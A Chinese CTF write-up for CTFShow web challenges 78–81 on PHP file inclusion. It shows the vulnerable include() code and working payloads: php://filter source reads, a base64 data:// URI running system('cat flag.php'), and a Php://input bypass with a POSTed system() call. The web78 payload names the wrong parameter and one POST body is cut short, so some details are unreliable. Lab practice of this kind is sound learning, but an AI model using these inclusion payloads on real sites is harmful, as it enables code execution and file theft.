CTFShow-Web入门-文件包含 78-

web78

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

使用 include进行了文件包含 

payload:?filter=php://filter/convert.base64-encode/resource=flag.php

web79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

替换了 php

payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

(PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=   为 <?php system('cat flag.php');

web80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

替换了 data

payload:?file=Php://

POST:<?php system('cat fl*');?

这里用hackbar无法传入,可以用burpsuite

web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

: 被替换

 

上一篇:Ctfshow Web入门 - PHP特性(待续)


下一篇:CTFSHOW-爆破-WEB21-28